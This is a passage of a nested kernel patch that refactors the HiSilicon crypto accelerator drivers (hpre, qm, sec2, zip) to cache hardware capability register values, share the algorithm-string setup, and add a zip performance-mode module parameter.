++	alg_msk = qm->cap_tables.dev_cap_table[HPRE_DEV_ALG_BITMAP_CAP_IDX].cap_val;
++	ret = hisi_qm_set_algs(qm, alg_msk, hpre_dev_algs, ARRAY_SIZE(hpre_dev_algs));
+ 	if (ret) {
+ 		pci_err(pdev, "Failed to set hpre algs!\n");
+ 		hisi_qm_uninit(qm);
+@@ -1181,11 +1191,12 @@ static int hpre_show_last_regs_init(struct hisi_qm *qm)
+ {
+ 	int cluster_dfx_regs_num =  ARRAY_SIZE(hpre_cluster_dfx_regs);
+ 	int com_dfx_regs_num = ARRAY_SIZE(hpre_com_dfx_regs);
+-	u8 clusters_num = hpre_cluster_num(qm);
+ 	struct qm_debug *debug = &qm->debug;
+ 	void __iomem *io_base;
++	u8 clusters_num;
+ 	int i, j, idx;
+ 
++	clusters_num = qm->cap_tables.dev_cap_table[HPRE_CLUSTER_NUM_CAP_IDX].cap_val;
+ 	debug->last_words = kcalloc(cluster_dfx_regs_num * clusters_num +
+ 			com_dfx_regs_num, sizeof(unsigned int), GFP_KERNEL);
+ 	if (!debug->last_words)
+@@ -1222,10 +1233,10 @@ static void hpre_show_last_dfx_regs(struct hisi_qm *qm)
+ {
+ 	int cluster_dfx_regs_num =  ARRAY_SIZE(hpre_cluster_dfx_regs);
+ 	int com_dfx_regs_num = ARRAY_SIZE(hpre_com_dfx_regs);
+-	u8 clusters_num = hpre_cluster_num(qm);
+ 	struct qm_debug *debug = &qm->debug;
+ 	struct pci_dev *pdev = qm->pdev;
+ 	void __iomem *io_base;
++	u8 clusters_num;
+ 	int i, j, idx;
+ 	u32 val;
+ 
+@@ -1240,6 +1251,7 @@ static void hpre_show_last_dfx_regs(struct hisi_qm *qm)
+ 			  hpre_com_dfx_regs[i].name, debug->last_words[i], val);
+ 	}
+ 
++	clusters_num = qm->cap_tables.dev_cap_table[HPRE_CLUSTER_NUM_CAP_IDX].cap_val;
+ 	for (i = 0; i < clusters_num; i++) {
+ 		io_base = qm->io_base + hpre_cluster_offsets[i];
+ 		for (j = 0; j <  cluster_dfx_regs_num; j++) {
+diff --git a/drivers/crypto/hisilicon/qm.c b/drivers/crypto/hisilicon/qm.c
+index f9acf7ecc41be..5539be1bfb402 100644
+--- a/drivers/crypto/hisilicon/qm.c
++++ b/drivers/crypto/hisilicon/qm.c
+@@ -237,6 +237,8 @@
+ #define QM_QOS_MAX_CIR_S		11
+ #define QM_AUTOSUSPEND_DELAY		3000
+ 
++#define QM_DEV_ALG_MAX_LEN		256
++
+ #define QM_MK_CQC_DW3_V1(hop_num, pg_sz, buf_sz, cqe_sz) \
+ 	(((hop_num) << QM_CQ_HOP_NUM_SHIFT)	| \
+ 	((pg_sz) << QM_CQ_PAGE_SIZE_SHIFT)	| \
+@@ -315,6 +317,13 @@ enum qm_basic_type {
+ 	QM_VF_IRQ_NUM_CAP,
+ };
+ 
++enum qm_pre_store_cap_idx {
++	QM_EQ_IRQ_TYPE_CAP_IDX = 0x0,
++	QM_AEQ_IRQ_TYPE_CAP_IDX,
++	QM_ABN_IRQ_TYPE_CAP_IDX,
++	QM_PF2VF_IRQ_TYPE_CAP_IDX,
++};
++
+ static const struct hisi_qm_cap_info qm_cap_info_comm[] = {
+ 	{QM_SUPPORT_DB_ISOLATION, 0x30,   0, BIT(0),  0x0, 0x0, 0x0},
+ 	{QM_SUPPORT_FUNC_QOS,     0x3100, 0, BIT(8),  0x0, 0x0, 0x1},
+@@ -344,6 +353,13 @@ static const struct hisi_qm_cap_info qm_basic_info[] = {
+ 	{QM_VF_IRQ_NUM_CAP,     0x311c,   0,  GENMASK(15, 0), 0x1,       0x2,       0x3},
+ };
+ 
++static const u32 qm_pre_store_caps[] = {
++	QM_EQ_IRQ_TYPE_CAP,
++	QM_AEQ_IRQ_TYPE_CAP,
++	QM_ABN_IRQ_TYPE_CAP,
++	QM_PF2VF_IRQ_TYPE_CAP,
++};
++
+ struct qm_mailbox {
+ 	__le16 w0;
+ 	__le16 queue_num;
+@@ -781,6 +797,40 @@ static void qm_get_xqc_depth(struct hisi_qm *qm, u16 *low_bits,
+ 	*high_bits = (depth >> QM_XQ_DEPTH_SHIFT) & QM_XQ_DEPTH_MASK;
+ }
+ 
++int hisi_qm_set_algs(struct hisi_qm *qm, u64 alg_msk, const struct qm_dev_alg *dev_algs,
++		     u32 dev_algs_size)
++{
++	struct device *dev = &qm->pdev->dev;
++	char *algs, *ptr;
++	int i;
++
++	if (!qm->uacce)
++		return 0;
++
++	if (dev_algs_size >= QM_DEV_ALG_MAX_LEN) {
++		dev_err(dev, "algs size %u is equal or larger than %d.\n",
++			dev_algs_size, QM_DEV_ALG_MAX_LEN);
++		return -EINVAL;
++	}
++
++	algs = devm_kzalloc(dev, QM_DEV_ALG_MAX_LEN * sizeof(char), GFP_KERNEL);
++	if (!algs)
++		return -ENOMEM;
++
++	for (i = 0; i < dev_algs_size; i++)
++		if (alg_msk & dev_algs[i].alg_msk)
++			strcat(algs, dev_algs[i].alg);
++
++	ptr = strrchr(algs, '\n');
++	if (ptr) {
++		*ptr = '\0';
++		qm->uacce->algs = algs;
++	}
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(hisi_qm_set_algs);
++
+ static u32 qm_get_irq_num(struct hisi_qm *qm)
+ {
+ 	if (qm->fun_type == QM_HW_PF)
+@@ -4804,7 +4854,7 @@ static void qm_unregister_abnormal_irq(struct hisi_qm *qm)
+ 	if (qm->fun_type == QM_HW_VF)
+ 		return;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_ABN_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_ABN_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_ABN_IRQ_TYPE_MASK))
+ 		return;
+ 
+@@ -4821,7 +4871,7 @@ static int qm_register_abnormal_irq(struct hisi_qm *qm)
+ 	if (qm->fun_type == QM_HW_VF)
+ 		return 0;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_ABN_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_ABN_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_ABN_IRQ_TYPE_MASK))
+ 		return 0;
+ 
+@@ -4838,7 +4888,7 @@ static void qm_unregister_mb_cmd_irq(struct hisi_qm *qm)
+ 	struct pci_dev *pdev = qm->pdev;
+ 	u32 irq_vector, val;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_PF2VF_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_PF2VF_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_IRQ_TYPE_MASK))
+ 		return;
+ 
+@@ -4852,7 +4902,7 @@ static int qm_register_mb_cmd_irq(struct hisi_qm *qm)
+ 	u32 irq_vector, val;
+ 	int ret;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_PF2VF_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_PF2VF_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_IRQ_TYPE_MASK))
+ 		return 0;
+ 
+@@ -4869,7 +4919,7 @@ static void qm_unregister_aeq_irq(struct hisi_qm *qm)
+ 	struct pci_dev *pdev = qm->pdev;
+ 	u32 irq_vector, val;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_AEQ_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_AEQ_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_IRQ_TYPE_MASK))
+ 		return;
+ 
+@@ -4883,7 +4933,7 @@ static int qm_register_aeq_irq(struct hisi_qm *qm)
+ 	u32 irq_vector, val;
+ 	int ret;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_AEQ_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_AEQ_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_IRQ_TYPE_MASK))
+ 		return 0;
+ 
+@@ -4901,7 +4951,7 @@ static void qm_unregister_eq_irq(struct hisi_qm *qm)
+ 	struct pci_dev *pdev = qm->pdev;
+ 	u32 irq_vector, val;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_EQ_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_EQ_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_IRQ_TYPE_MASK))
+ 		return;
+ 
+@@ -4915,7 +4965,7 @@ static int qm_register_eq_irq(struct hisi_qm *qm)
+ 	u32 irq_vector, val;
+ 	int ret;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_EQ_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_EQ_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_IRQ_TYPE_MASK))
+ 		return 0;
+ 
+@@ -5003,7 +5053,29 @@ static int qm_get_qp_num(struct hisi_qm *qm)
+ 	return 0;
+ }
+ 
+-static void qm_get_hw_caps(struct hisi_qm *qm)
++static int qm_pre_store_irq_type_caps(struct hisi_qm *qm)
++{
++	struct hisi_qm_cap_record *qm_cap;
++	struct pci_dev *pdev = qm->pdev;
++	size_t i, size;
++
++	size = ARRAY_SIZE(qm_pre_store_caps);
++	qm_cap = devm_kzalloc(&pdev->dev, sizeof(*qm_cap) * size, GFP_KERNEL);
++	if (!qm_cap)
++		return -ENOMEM;
++
++	for (i = 0; i < size; i++) {
++		qm_cap[i].type = qm_pre_store_caps[i];
++		qm_cap[i].cap_val = hisi_qm_get_hw_info(qm, qm_basic_info,
++							qm_pre_store_caps[i], qm->cap_ver);
++	}
++
++	qm->cap_tables.qm_cap_table = qm_cap;
++
++	return 0;
++}
++
++static int qm_get_hw_caps(struct hisi_qm *qm)
+ {
+ 	const struct hisi_qm_cap_info *cap_info = qm->fun_type == QM_HW_PF ?
+ 						  qm_cap_info_pf : qm_cap_info_vf;
+@@ -5034,6 +5106,9 @@ static void qm_get_hw_caps(struct hisi_qm *qm)
+ 		if (val)
+ 			set_bit(cap_info[i].type, &qm->caps);
+ 	}
++
++	/* Fetch and save the value of irq type related capability registers */
++	return qm_pre_store_irq_type_caps(qm);
+ }
+ 
+ static int qm_get_pci_res(struct hisi_qm *qm)
+@@ -5055,7 +5130,10 @@ static int qm_get_pci_res(struct hisi_qm *qm)
+ 		goto err_request_mem_regions;
+ 	}
+ 
+-	qm_get_hw_caps(qm);
++	ret = qm_get_hw_caps(qm);
++	if (ret)
++		goto err_ioremap;
++
+ 	if (test_bit(QM_SUPPORT_DB_ISOLATION, &qm->caps)) {
+ 		qm->db_interval = QM_QP_DB_INTERVAL;
+ 		qm->db_phys_base = pci_resource_start(pdev, PCI_BAR_4);
+diff --git a/drivers/crypto/hisilicon/sec2/sec.h b/drivers/crypto/hisilicon/sec2/sec.h
+index 3e57fc04b3770..410c83712e285 100644
+--- a/drivers/crypto/hisilicon/sec2/sec.h
++++ b/drivers/crypto/hisilicon/sec2/sec.h
+@@ -220,6 +220,13 @@ enum sec_cap_type {
+ 	SEC_CORE4_ALG_BITMAP_HIGH,
+ };
+ 
++enum sec_cap_reg_record_idx {
++	SEC_DRV_ALG_BITMAP_LOW_IDX = 0x0,
++	SEC_DRV_ALG_BITMAP_HIGH_IDX,
++	SEC_DEV_ALG_BITMAP_LOW_IDX,
++	SEC_DEV_ALG_BITMAP_HIGH_IDX,
++};
++
+ void sec_destroy_qps(struct hisi_qp **qps, int qp_num);
+ struct hisi_qp **sec_create_qps(void);
+ int sec_register_to_crypto(struct hisi_qm *qm);
+diff --git a/drivers/crypto/hisilicon/sec2/sec_crypto.c b/drivers/crypto/hisilicon/sec2/sec_crypto.c
+index 84ae8ddd1a131..cae7c414bdaf4 100644
+--- a/drivers/crypto/hisilicon/sec2/sec_crypto.c
++++ b/drivers/crypto/hisilicon/sec2/sec_crypto.c
+@@ -2546,8 +2546,12 @@ err:
+ 
+ int sec_register_to_crypto(struct hisi_qm *qm)
+ {
+-	u64 alg_mask = sec_get_alg_bitmap(qm, SEC_DRV_ALG_BITMAP_HIGH, SEC_DRV_ALG_BITMAP_LOW);
+-	int ret;
++	u64 alg_mask;
++	int ret = 0;
++
++	alg_mask = sec_get_alg_bitmap(qm, SEC_DRV_ALG_BITMAP_HIGH_IDX,
++				      SEC_DRV_ALG_BITMAP_LOW_IDX);
++
+ 
+ 	ret = sec_register_skcipher(alg_mask);
+ 	if (ret)
+@@ -2562,7 +2566,10 @@ int sec_register_to_crypto(struct hisi_qm *qm)
+ 
+ void sec_unregister_from_crypto(struct hisi_qm *qm)
+ {
+-	u64 alg_mask = sec_get_alg_bitmap(qm, SEC_DRV_ALG_BITMAP_HIGH, SEC_DRV_ALG_BITMAP_LOW);
++	u64 alg_mask;
++
++	alg_mask = sec_get_alg_bitmap(qm, SEC_DRV_ALG_BITMAP_HIGH_IDX,
++				      SEC_DRV_ALG_BITMAP_LOW_IDX);
+ 
+ 	sec_unregister_aead(alg_mask, ARRAY_SIZE(sec_aeads));
+ 	sec_unregister_skcipher(alg_mask, ARRAY_SIZE(sec_skciphers));
+diff --git a/drivers/crypto/hisilicon/sec2/sec_main.c b/drivers/crypto/hisilicon/sec2/sec_main.c
+index e384988bda917..4bab5000a13e5 100644
+--- a/drivers/crypto/hisilicon/sec2/sec_main.c
++++ b/drivers/crypto/hisilicon/sec2/sec_main.c
+@@ -121,7 +121,6 @@
+ 					GENMASK_ULL(42, 25))
+ #define SEC_AEAD_BITMAP			(GENMASK_ULL(7, 6) | GENMASK_ULL(18, 17) | \
+ 					GENMASK_ULL(45, 43))
+-#define SEC_DEV_ALG_MAX_LEN		256
+ 
+ struct sec_hw_error {
+ 	u32 int_msk;
+@@ -133,11 +132,6 @@ struct sec_dfx_item {
+ 	u32 offset;
+ };
+ 
+-struct sec_dev_alg {
+-	u64 alg_msk;
+-	const char *algs;
+-};
+-
+ static const char sec_name[] = "hisi_sec2";
+ static struct dentry *sec_debugfs_root;
+ 
+@@ -174,15 +168,22 @@ static const struct hisi_qm_cap_info sec_basic_info[] = {
+ 	{SEC_CORE4_ALG_BITMAP_HIGH, 0x3170, 0, GENMASK(31, 0), 0x3FFF, 0x3FFF, 0x3FFF},
+ };
+ 
+-static const struct sec_dev_alg sec_dev_algs[] = { {
++static const u32 sec_pre_store_caps[] = {
++	SEC_DRV_ALG_BITMAP_LOW,
++	SEC_DRV_ALG_BITMAP_HIGH,
++	SEC_DEV_ALG_BITMAP_LOW,
++	SEC_DEV_ALG_BITMAP_HIGH,
++};
++
++static const struct qm_dev_alg sec_dev_algs[] = { {
+ 		.alg_msk = SEC_CIPHER_BITMAP,
+-		.algs = "cipher\n",
++		.alg = "cipher\n",
+ 	}, {
+ 		.alg_msk = SEC_DIGEST_BITMAP,
+-		.algs = "digest\n",
++		.alg = "digest\n",
+ 	}, {
+ 		.alg_msk = SEC_AEAD_BITMAP,
+-		.algs = "aead\n",
++		.alg = "aead\n",
+ 	},
+ };
+ 
+@@ -395,8 +396,8 @@ u64 sec_get_alg_bitmap(struct hisi_qm *qm, u32 high, u32 low)
+ {
+ 	u32 cap_val_h, cap_val_l;
+ 
+-	cap_val_h = hisi_qm_get_hw_info(qm, sec_basic_info, high, qm->cap_ver);
+-	cap_val_l = hisi_qm_get_hw_info(qm, sec_basic_info, low, qm->cap_ver);
++	cap_val_h = qm->cap_tables.dev_cap_table[high].cap_val;
++	cap_val_l = qm->cap_tables.dev_cap_table[low].cap_val;
+ 
+ 	return ((u64)cap_val_h << SEC_ALG_BITMAP_SHIFT) | (u64)cap_val_l;
+ }
+@@ -1079,37 +1080,31 @@ static int sec_pf_probe_init(struct sec_dev *sec)
+ 	return ret;
+ }
+ 
+-static int sec_set_qm_algs(struct hisi_qm *qm)
++static int sec_pre_store_cap_reg(struct hisi_qm *qm)
+ {
+-	struct device *dev = &qm->pdev->dev;
+-	char *algs, *ptr;
+-	u64 alg_mask;
+-	int i;
+-
+-	if (!qm->use_sva)
+-		return 0;
++	struct hisi_qm_cap_record *sec_cap;
++	struct pci_dev *pdev = qm->pdev;
++	size_t i, size;
+ 
+-	algs = devm_kzalloc(dev, SEC_DEV_ALG_MAX_LEN * sizeof(char), GFP_KERNEL);
+-	if (!algs)
++	size = ARRAY_SIZE(sec_pre_store_caps);
++	sec_cap = devm_kzalloc(&pdev->dev, sizeof(*sec_cap) * size, GFP_KERNEL);
++	if (!sec_cap)
+ 		return -ENOMEM;
+ 
+-	alg_mask = sec_get_alg_bitmap(qm, SEC_DEV_ALG_BITMAP_HIGH, SEC_DEV_ALG_BITMAP_LOW);
+-
+-	for (i = 0; i < ARRAY_SIZE(sec_dev_algs); i++)
+-		if (alg_mask & sec_dev_algs[i].alg_msk)
+-			strcat(algs, sec_dev_algs[i].algs);
+-
+-	ptr = strrchr(algs, '\n');
+-	if (ptr)
+-		*ptr = '\0';
++	for (i = 0; i < size; i++) {
++		sec_cap[i].type = sec_pre_store_caps[i];
++		sec_cap[i].cap_val = hisi_qm_get_hw_info(qm, sec_basic_info,
++				     sec_pre_store_caps[i], qm->cap_ver);
++	}
+ 
+-	qm->uacce->algs = algs;
++	qm->cap_tables.dev_cap_table = sec_cap;
+ 
+ 	return 0;
+ }
+ 
+ static int sec_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ {
++	u64 alg_msk;
+ 	int ret;
+ 
+ 	qm->pdev = pdev;
+@@ -1144,7 +1139,16 @@ static int sec_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ 		return ret;
+ 	}
+ 
+-	ret = sec_set_qm_algs(qm);
++	/* Fetch and save the value of capability registers */
++	ret = sec_pre_store_cap_reg(qm);
++	if (ret) {
++		pci_err(qm->pdev, "Failed to pre-store capability registers!\n");
++		hisi_qm_uninit(qm);
++		return ret;
++	}
++
++	alg_msk = sec_get_alg_bitmap(qm, SEC_DEV_ALG_BITMAP_HIGH_IDX, SEC_DEV_ALG_BITMAP_LOW_IDX);
++	ret = hisi_qm_set_algs(qm, alg_msk, sec_dev_algs, ARRAY_SIZE(sec_dev_algs));
+ 	if (ret) {
+ 		pci_err(qm->pdev, "Failed to set sec algs!\n");
+ 		hisi_qm_uninit(qm);
+diff --git a/drivers/crypto/hisilicon/zip/zip_main.c b/drivers/crypto/hisilicon/zip/zip_main.c
+index 190b4fecfc747..9e3f5bca27dee 100644
+--- a/drivers/crypto/hisilicon/zip/zip_main.c
++++ b/drivers/crypto/hisilicon/zip/zip_main.c
+@@ -74,7 +74,6 @@
+ #define HZIP_AXI_SHUTDOWN_ENABLE	BIT(14)
+ #define HZIP_WR_PORT			BIT(11)
+ 
+-#define HZIP_DEV_ALG_MAX_LEN		256
+ #define HZIP_ALG_ZLIB_BIT		GENMASK(1, 0)
+ #define HZIP_ALG_GZIP_BIT		GENMASK(3, 2)
+ #define HZIP_ALG_DEFLATE_BIT		GENMASK(5, 4)
+@@ -107,6 +106,14 @@
+ #define HZIP_CLOCK_GATED_EN		(HZIP_CORE_GATED_EN | \
+ 					 HZIP_CORE_GATED_OOO_EN)
+ 
++/* zip comp high performance */
++#define HZIP_HIGH_PERF_OFFSET		0x301208
++
++enum {
++	HZIP_HIGH_COMP_RATE,
++	HZIP_HIGH_COMP_PERF,
++};
++
+ static const char hisi_zip_name[] = "hisi_zip";
+ static struct dentry *hzip_debugfs_root;
+ 
+@@ -120,23 +127,18 @@ struct zip_dfx_item {
+ 	u32 offset;
+ };
+ 
+-struct zip_dev_alg {
+-	u32 alg_msk;
+-	const char *algs;
+-};
+-
+-static const struct zip_dev_alg zip_dev_algs[] = { {
++static const struct qm_dev_alg zip_dev_algs[] = { {
+ 		.alg_msk = HZIP_ALG_ZLIB_BIT,
+-		.algs = "zlib\n",
++		.alg = "zlib\n",
+ 	}, {
+ 		.alg_msk = HZIP_ALG_GZIP_BIT,
+-		.algs = "gzip\n",
++		.alg = "gzip\n",
+ 	}, {
+ 		.alg_msk = HZIP_ALG_DEFLATE_BIT,
+-		.algs = "deflate\n",
++		.alg = "deflate\n",
+ 	}, {
+ 		.alg_msk = HZIP_ALG_LZ77_BIT,
+-		.algs = "lz77_zstd\n",
++		.alg = "lz77_zstd\n",
+ 	},
+ };
+ 
+@@ -247,6 +249,26 @@ static struct hisi_qm_cap_info zip_basic_cap_info[] = {
+ 	{ZIP_CAP_MAX, 0x317c, 0, GENMASK(0, 0), 0x0, 0x0, 0x0}
+ };
+ 
++enum zip_pre_store_cap_idx {
++	ZIP_CORE_NUM_CAP_IDX = 0x0,
++	ZIP_CLUSTER_COMP_NUM_CAP_IDX,
++	ZIP_CLUSTER_DECOMP_NUM_CAP_IDX,
++	ZIP_DECOMP_ENABLE_BITMAP_IDX,
++	ZIP_COMP_ENABLE_BITMAP_IDX,
++	ZIP_DRV_ALG_BITMAP_IDX,
++	ZIP_DEV_ALG_BITMAP_IDX,
++};
++
++static const u32 zip_pre_store_caps[] = {
++	ZIP_CORE_NUM_CAP,
++	ZIP_CLUSTER_COMP_NUM_CAP,
++	ZIP_CLUSTER_DECOMP_NUM_CAP,
++	ZIP_DECOMP_ENABLE_BITMAP,
++	ZIP_COMP_ENABLE_BITMAP,
++	ZIP_DRV_ALG_BITMAP,
++	ZIP_DEV_ALG_BITMAP,
++};
++
+ enum {
+ 	HZIP_COMP_CORE0,
+ 	HZIP_COMP_CORE1,
+@@ -352,6 +374,37 @@ static int hzip_diff_regs_show(struct seq_file *s, void *unused)
+ 	return 0;
+ }
+ DEFINE_SHOW_ATTRIBUTE(hzip_diff_regs);
++
++static int perf_mode_set(const char *val, const struct kernel_param *kp)
++{
++	int ret;
++	u32 n;
++
++	if (!val)
++		return -EINVAL;
++
++	ret = kstrtou32(val, 10, &n);
++	if (ret != 0 || (n != HZIP_HIGH_COMP_PERF &&
++			 n != HZIP_HIGH_COMP_RATE))
++		return -EINVAL;
++
++	return param_set_int(val, kp);
++}
++
++static const struct kernel_param_ops zip_com_perf_ops = {
++	.set = perf_mode_set,
++	.get = param_get_int,
++};
++
++/*
++ * perf_mode = 0 means enable high compression rate mode,
++ * perf_mode = 1 means enable high compression performance mode.
++ * These two modes only apply to the compression direction.
++ */
++static u32 perf_mode = HZIP_HIGH_COMP_RATE;
++module_param_cb(perf_mode, &zip_com_perf_ops, &perf_mode, 0444);
++MODULE_PARM_DESC(perf_mode, "ZIP high perf mode 0(default), 1(enable)");
++
+ static const struct kernel_param_ops zip_uacce_mode_ops = {
+ 	.set = uacce_mode_set,
+ 	.get = param_get_int,
+@@ -410,40 +463,33 @@ bool hisi_zip_alg_support(struct hisi_qm *qm, u32 alg)
+ {
+ 	u32 cap_val;
+ 
+-	cap_val = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_DRV_ALG_BITMAP, qm->cap_ver);
++	cap_val = qm->cap_tables.dev_cap_table[ZIP_DRV_ALG_BITMAP_IDX].cap_val;
+ 	if ((alg & cap_val) == alg)
+ 		return true;
+ 
+ 	return false;
+ }
+ 
+-static int hisi_zip_set_qm_algs(struct hisi_qm *qm)
++static int hisi_zip_set_high_perf(struct hisi_qm *qm)
+ {
+-	struct device *dev = &qm->pdev->dev;
+-	char *algs, *ptr;
+-	u32 alg_mask;
+-	int i;
+-
+-	if (!qm->use_sva)
+-		return 0;
+-
+-	algs = devm_kzalloc(dev, HZIP_DEV_ALG_MAX_LEN * sizeof(char), GFP_KERNEL);
+-	if (!algs)
+-		return -ENOMEM;
+-
+-	alg_mask = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_DEV_ALG_BITMAP, qm->cap_ver);
+-
+-	for (i = 0; i < ARRAY_SIZE(zip_dev_algs); i++)
+-		if (alg_mask & zip_dev_algs[i].alg_msk)
+-			strcat(algs, zip_dev_algs[i].algs);
+-
+-	ptr = strrchr(algs, '\n');
+-	if (ptr)
+-		*ptr = '\0';
++	u32 val;
++	int ret;
+ 
+-	qm->uacce->algs = algs;
++	val = readl_relaxed(qm->io_base + HZIP_HIGH_PERF_OFFSET);
++	if (perf_mode == HZIP_HIGH_COMP_PERF)
++		val |= HZIP_HIGH_COMP_PERF;
++	else
++		val &= ~HZIP_HIGH_COMP_PERF;
++
++	/* Set perf mode */
++	writel(val, qm->io_base + HZIP_HIGH_PERF_OFFSET);
++	ret = readl_relaxed_poll_timeout(qm->io_base + HZIP_HIGH_PERF_OFFSET,
++					 val, val == perf_mode, HZIP_DELAY_1_US,
++					 HZIP_POLL_TIMEOUT_US);
++	if (ret)
++		pci_err(qm->pdev, "failed to set perf mode\n");
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static void hisi_zip_open_sva_prefetch(struct hisi_qm *qm)
+@@ -542,10 +588,8 @@ static int hisi_zip_set_user_domain_and_cache(struct hisi_qm *qm)
+ 	}
+ 
+ 	/* let's open all compression/decompression cores */
+-	dcomp_bm = hisi_qm_get_hw_info(qm, zip_basic_cap_info,
+-				       ZIP_DECOMP_ENABLE_BITMAP, qm->cap_ver);
+-	comp_bm = hisi_qm_get_hw_info(qm, zip_basic_cap_info,
+-				      ZIP_COMP_ENABLE_BITMAP, qm->cap_ver);
++	dcomp_bm = qm->cap_tables.dev_cap_table[ZIP_DECOMP_ENABLE_BITMAP_IDX].cap_val;
++	comp_bm = qm->cap_tables.dev_cap_table[ZIP_COMP_ENABLE_BITMAP_IDX].cap_val;
+ 	writel(HZIP_DECOMP_CHECK_ENABLE | dcomp_bm | comp_bm, base + HZIP_CLOCK_GATE_CTRL);
+ 
+ 	/* enable sqc,cqc writeback */
+@@ -772,9 +816,8 @@ static int hisi_zip_core_debug_init(struct hisi_qm *qm)
+ 	char buf[HZIP_BUF_SIZE];
+ 	int i;
+ 
+-	zip_core_num = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_CORE_NUM_CAP, qm->cap_ver);
+-	zip_comp_core_num = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_CLUSTER_COMP_NUM_CAP,
+-						qm->cap_ver);
++	zip_core_num = qm->cap_tables.dev_cap_table[ZIP_CORE_NUM_CAP_IDX].cap_val;
++	zip_comp_core_num = qm->cap_tables.dev_cap_table[ZIP_CLUSTER_COMP_NUM_CAP_IDX].cap_val;
+ 
+ 	for (i = 0; i < zip_core_num; i++) {
+ 		if (i < zip_comp_core_num)
+@@ -916,7 +959,7 @@ static int hisi_zip_show_last_regs_init(struct hisi_qm *qm)
+ 	u32 zip_core_num;
+ 	int i, j, idx;
+ 
+-	zip_core_num = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_CORE_NUM_CAP, qm->cap_ver);
++	zip_core_num = qm->cap_tables.dev_cap_table[ZIP_CORE_NUM_CAP_IDX].cap_val;
+ 
+ 	debug->last_words = kcalloc(core_dfx_regs_num * zip_core_num + com_dfx_regs_num,
+ 				    sizeof(unsigned int), GFP_KERNEL);
+@@ -972,9 +1015,9 @@ static void hisi_zip_show_last_dfx_regs(struct hisi_qm *qm)
+ 				 hzip_com_dfx_regs[i].name, debug->last_words[i], val);
+ 	}
+ 
+-	zip_core_num = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_CORE_NUM_CAP, qm->cap_ver);
+-	zip_comp_core_num = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_CLUSTER_COMP_NUM_CAP,
+-						qm->cap_ver);
++	zip_core_num = qm->cap_tables.dev_cap_table[ZIP_CORE_NUM_CAP_IDX].cap_val;
++	zip_comp_core_num = qm->cap_tables.dev_cap_table[ZIP_CLUSTER_COMP_NUM_CAP_IDX].cap_val;
++
+ 	for (i = 0; i < zip_core_num; i++) {
+ 		if (i < zip_comp_core_num)
+ 			scnprintf(buf, sizeof(buf), "Comp_core-%d", i);
+@@ -1115,6 +1158,10 @@ static int hisi_zip_pf_probe_init(struct hisi_zip *hisi_zip)
+ 	if (ret)
+ 		return ret;
+ 
++	ret = hisi_zip_set_high_perf(qm);
++	if (ret)
++		return ret;
++
+ 	hisi_zip_open_sva_prefetch(qm);
+ 	hisi_qm_dev_err_init(qm);
+ 	hisi_zip_debug_regs_clear(qm);
+@@ -1126,8 +1173,31 @@ static int hisi_zip_pf_probe_init(struct hisi_zip *hisi_zip)
+ 	return ret;
+ }
+ 
++static int zip_pre_store_cap_reg(struct hisi_qm *qm)
++{
++	struct hisi_qm_cap_record *zip_cap;
++	struct pci_dev *pdev = qm->pdev;
++	size_t i, size;
++
++	size = ARRAY_SIZE(zip_pre_store_caps);
++	zip_cap = devm_kzalloc(&pdev->dev, sizeof(*zip_cap) * size, GFP_KERNEL);
++	if (!zip_cap)
++		return -ENOMEM;
++
++	for (i = 0; i < size; i++) {
++		zip_cap[i].type = zip_pre_store_caps[i];
++		zip_cap[i].cap_val = hisi_qm_get_hw_info(qm, zip_basic_cap_info,
++				     zip_pre_store_caps[i], qm->cap_ver);
++	}
++
++	qm->cap_tables.dev_cap_table = zip_cap;
++
++	return 0;
++}
++
+ static int hisi_zip_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ {
++	u64 alg_msk;
+ 	int ret;
+ 
+ 	qm->pdev = pdev;
